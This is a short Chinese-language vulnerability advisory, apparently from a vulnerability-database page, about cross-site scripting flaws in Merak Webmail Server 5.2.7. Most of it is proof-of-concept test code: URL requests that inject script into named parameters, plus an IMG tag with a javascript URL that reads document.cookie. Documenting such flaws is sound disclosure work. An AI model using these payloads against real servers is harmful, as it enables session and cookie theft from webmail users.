漏洞描述:
```
Merak Webmail Server 5.2.7版本中存在多个跨站脚本(XSS)漏洞。远程攻击者可以通过category, cserver, ext, global,showgroups, address.html中的showlite参数,或者spage 或者 settings.html中的autoresponder参数,readmail.html中的folder参数,或者 attachment.html中的attachmentpage_text_error参数 folder, ct, 或者 calendar.html中的 cv 参数, 标签, 或者电子邮件主题注入任意web脚本或HTML。
```
测试代码:
```
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/attachment.html?attachmentpage_text_error=">[XSS]
<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>
```
京公网安备 11010502034610号
暂无评论